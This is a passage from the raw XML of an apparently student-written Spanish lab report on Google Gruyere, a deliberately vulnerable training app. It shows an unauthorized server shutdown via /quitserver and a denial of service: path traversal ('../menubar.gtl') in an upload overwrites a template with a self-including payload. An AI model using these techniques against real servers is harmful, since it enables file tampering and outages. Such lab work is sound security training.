      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F8461D" w14:textId="78748000" w:rsidR="00011C8D" w:rsidRDefault="00011C8D" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Encontramos en la barra de direcciones que lo maneja el mange.gtl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285F6754" w14:textId="6F0BC792" w:rsidR="00011C8D" w:rsidRDefault="00011C8D" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F425E0" w14:textId="4B5FB702" w:rsidR="00011C8D" w:rsidRDefault="00011C8D" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00011C8D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7548D215" wp14:editId="6A17F559">
            <wp:extent cx="5400040" cy="5841365"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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5841365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FCA11E" w14:textId="7F7080DC" w:rsidR="00011C8D" w:rsidRDefault="00011C8D" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A0C72CF" w14:textId="6874CD58" w:rsidR="00011C8D" w:rsidRDefault="00011C8D" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Lo miraremos en el servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAF56DA" w14:textId="6779C4F6" w:rsidR="00011C8D" w:rsidRDefault="00011C8D" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00011C8D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FB8B11B" wp14:editId="0DD2B516">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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00040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45860582" w14:textId="1F01371B" w:rsidR="00011C8D" w:rsidRDefault="00011C8D" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Vemos que tenemos la URL /quitserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CABC707" w14:textId="7ACE12D6" w:rsidR="005040F8" w:rsidRDefault="005040F8" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora vamos a crear una nueva cuenta sin permisos de administrador la llamare ‘dos’ y de contraseña ‘dos’</w:t>
      </w:r>
      <w:r w:rsidR="00400721">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB5A323" w14:textId="2940583F" w:rsidR="00400721" w:rsidRDefault="00400721" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24863D42" w14:textId="28444F25" w:rsidR="00400721" w:rsidRDefault="00400721" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00400721">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FD6D5C1" wp14:editId="4A2C8056">
            <wp:extent cx="5400040" cy="5842000"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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5842000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9CF822" w14:textId="35D1302E" w:rsidR="00400721" w:rsidRDefault="00400721" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353230CC" w14:textId="6186E503" w:rsidR="00400721" w:rsidRDefault="00400721" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0C9B4E" w14:textId="10857632" w:rsidR="00400721" w:rsidRDefault="00400721" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00400721">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01FB114E" wp14:editId="46E3BC83">
            <wp:extent cx="5400040" cy="5842000"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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040" cy="5842000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B142298" w14:textId="7E801787" w:rsidR="00975DCF" w:rsidRDefault="00975DCF" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13138F0E" w14:textId="406D09BE" w:rsidR="00975DCF" w:rsidRDefault="00975DCF" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00975DCF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23DBBA8A" wp14:editId="59E850B5">
            <wp:extent cx="5400040" cy="5842000"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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0040" cy="5842000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="321B9DA2" w14:textId="4375FC89" w:rsidR="00975DCF" w:rsidRDefault="00975DCF" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2065F867" w14:textId="1A477955" w:rsidR="00975DCF" w:rsidRDefault="00975DCF" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora con este usuario sin derechos de administración </w:t>
      </w:r>
      <w:r w:rsidR="00B726BB">
        <w:t>voy a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> intentar acceder a esa url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559EC05A" w14:textId="4646243F" w:rsidR="00975DCF" w:rsidRDefault="00975DCF" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BE95FC7" w14:textId="2A8AE6AB" w:rsidR="00975DCF" w:rsidRDefault="00975DCF" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00975DCF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="262D2611" wp14:editId="6AD5E3A3">
            <wp:extent cx="5400040" cy="290258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00040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBFEABD" w14:textId="605190A9" w:rsidR="00975DCF" w:rsidRDefault="00975DCF" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Podemos ver que el servidor se cerró, podremos comprobarlo en el mismo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EA2194" w14:textId="3B16F7A5" w:rsidR="00975DCF" w:rsidRDefault="00975DCF" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B27365A" w14:textId="4F34EBCA" w:rsidR="00975DCF" w:rsidRDefault="00975DCF" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00975DCF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30659E2E" wp14:editId="36B160ED">
            <wp:extent cx="5399413" cy="4745421"/>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11483" cy="4756029"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C469573" w14:textId="7511F67D" w:rsidR="00975DCF" w:rsidRDefault="00975DCF" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61909C06" w14:textId="40F2C33C" w:rsidR="00975DCF" w:rsidRDefault="00975DCF" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5116CEC4" w14:textId="730726DE" w:rsidR="00975DCF" w:rsidRDefault="00975DCF" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="746B018A" w14:textId="3C38AB1D" w:rsidR="00975DCF" w:rsidRDefault="00975DCF" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560047E1" w14:textId="65095AF7" w:rsidR="00400721" w:rsidRDefault="00400721" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61DDDF35" w14:textId="77777777" w:rsidR="00011C8D" w:rsidRDefault="00011C8D" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D957EF" w14:textId="60068C5C" w:rsidR="00011C8D" w:rsidRDefault="00011C8D" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F2E602" w14:textId="7BBC1E39" w:rsidR="001A5205" w:rsidRDefault="001A5205">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc128034171"/>
      <w:r>
        <w:t>DoS – Sobrecarga del servidor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="7AE0624C" w14:textId="20646B41" w:rsidR="000739B1" w:rsidRDefault="000739B1" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora que sabemos que Google Gruyere es vulnerable al ‘Path transversal’, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47736452" w14:textId="6A79057E" w:rsidR="000739B1" w:rsidRDefault="000739B1" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Podremos modificar un fichero </w:t>
      </w:r>
      <w:r w:rsidR="00B726BB">
        <w:t>del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> servidor, para poner a Gruyere en un bucle infinito, con una solicitud que se repite sin fin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49682AC9" w14:textId="5D56DB4C" w:rsidR="000739B1" w:rsidRPr="000739B1" w:rsidRDefault="000739B1" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para esto </w:t>
      </w:r>
      <w:r w:rsidR="00C107A6">
        <w:t>voy a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> usar el fichero menubar.gtl, para hacer este ataque voy a iniciar sesión con la cuenta ‘usuario’ y contraseña ‘usuario’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373C236E" w14:textId="77777777" w:rsidR="001A5205" w:rsidRPr="001A5205" w:rsidRDefault="001A5205" w:rsidP="001A5205">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082DF534" w14:textId="77777777" w:rsidR="006B703C" w:rsidRPr="006B703C" w:rsidRDefault="006B703C" w:rsidP="006B703C"/>
    <w:p w14:paraId="1670E1D2" w14:textId="77777777" w:rsidR="005273D6" w:rsidRPr="00810052" w:rsidRDefault="005273D6" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C077DC6" w14:textId="49626CFB" w:rsidR="00DF529E" w:rsidRDefault="000739B1" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="000739B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37FA773F" wp14:editId="5762578B">
            <wp:extent cx="5400040" cy="4319752"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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03737" cy="4322709"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFBA96E" w14:textId="549FCF68" w:rsidR="000739B1" w:rsidRDefault="000739B1" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E49895" w14:textId="010C1123" w:rsidR="000739B1" w:rsidRDefault="000739B1" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Y ahora </w:t>
      </w:r>
      <w:r w:rsidR="006B1CB1">
        <w:t>pondré</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en la URL menubar.gtl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3363B131" w14:textId="2F180750" w:rsidR="000739B1" w:rsidRDefault="000739B1" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="000739B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47DD53BD" wp14:editId="52162C8C">
            <wp:extent cx="5400040" cy="290258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2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="349F5041" w14:textId="5ED6AF3E" w:rsidR="000739B1" w:rsidRDefault="000739B1" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0DD15C" w14:textId="054923F1" w:rsidR="000739B1" w:rsidRDefault="000739B1" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este archivo </w:t>
      </w:r>
      <w:r w:rsidR="006B1CB1">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en cada página que navegaremos por lo cual es una muy buena opción este será el código que tendrá:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAA52A8" w14:textId="4FE0947C" w:rsidR="000739B1" w:rsidRDefault="000739B1" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000739B1">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>[[include:menubar.gtl]]DoS[[/include:menubar.gtl]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AD2971" w14:textId="0F1BD06F" w:rsidR="00417B66" w:rsidRDefault="00417B66" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3917F9E2" w14:textId="78669937" w:rsidR="00417B66" w:rsidRDefault="00417B66" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Este sería el archivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCE44D2" w14:textId="1310BDAE" w:rsidR="00417B66" w:rsidRDefault="00417B66" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00417B66">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74BBD60E" wp14:editId="3D2E8F08">
            <wp:extent cx="5400040" cy="3697014"/>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6020" cy="3701108"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="044988DE" w14:textId="14145929" w:rsidR="00417B66" w:rsidRDefault="00417B66" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAD2952" w14:textId="653CF821" w:rsidR="00417B66" w:rsidRDefault="00417B66" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Ahora procederemos a subirlo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F07FECD" w14:textId="20C6DF22" w:rsidR="00417B66" w:rsidRDefault="00417B66" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="086ADB1F" w14:textId="0BD195AA" w:rsidR="00417B66" w:rsidRDefault="00417B66" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00417B66">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F0A3B3" wp14:editId="53AC15EA">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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00040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02676491" w14:textId="5389BEEE" w:rsidR="00417B66" w:rsidRDefault="00417B66" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="666E8967" w14:textId="48892A46" w:rsidR="00417B66" w:rsidRDefault="00417B66" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Ahora capturo esta petición, y modifico la ruta del fichero:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5127972C" w14:textId="76DF415B" w:rsidR="00417B66" w:rsidRDefault="00417B66" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDB401C" w14:textId="7B169320" w:rsidR="00417B66" w:rsidRDefault="00417B66" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00417B66">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="042A3F95" wp14:editId="41D6042B">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1726EA" w14:textId="0F3CB541" w:rsidR="00D822C5" w:rsidRDefault="00D822C5" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="270234B7" w14:textId="59F2286A" w:rsidR="00D822C5" w:rsidRDefault="00D822C5" w:rsidP="00D822C5">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:r w:rsidR="006B1CB1">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>hecho</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de poner ../menubar.gtl, es porque por defecto las ficheros se guardan en la carpeta del usuario que </w:t>
      </w:r>
      <w:r w:rsidR="00C107A6">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la misma carpeta que menubar, entonces para yo acceder al menubar tengo que subir una carpeta y esto la hago con ../ :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65531AEB" w14:textId="065E4E84" w:rsidR="00D822C5" w:rsidRDefault="00D822C5" w:rsidP="00D822C5">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D822C5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AF6DBD7" wp14:editId="7E73E5AE">
            <wp:extent cx="5400040" cy="365887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3658870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C10542" w14:textId="2BF3A60B" w:rsidR="00D822C5" w:rsidRDefault="00D822C5" w:rsidP="00D822C5">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D35D195" w14:textId="77777777" w:rsidR="00D822C5" w:rsidRDefault="00D822C5" w:rsidP="00D822C5">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A902EAD" w14:textId="3E46A431" w:rsidR="00417B66" w:rsidRDefault="00417B66" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Y por último envió la petición</w:t>
      </w:r>
      <w:r w:rsidR="0007255E">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>, ahora miraremos el archivo en el servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3715CEA2" w14:textId="5AA4E6BB" w:rsidR="0007255E" w:rsidRDefault="0007255E" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03347186" w14:textId="54DBAF00" w:rsidR="0007255E" w:rsidRDefault="0007255E" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007255E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2622D811" wp14:editId="24E734A7">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD58605" w14:textId="66BE97ED" w:rsidR="0007255E" w:rsidRDefault="0007255E" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D75735" w14:textId="7997322C" w:rsidR="0007255E" w:rsidRDefault="0007255E" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Y ya no tenemos respuesta </w:t>
      </w:r>
      <w:r w:rsidR="006B1CB1">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>del servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0ED027" w14:textId="59544959" w:rsidR="0007255E" w:rsidRDefault="0007255E" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
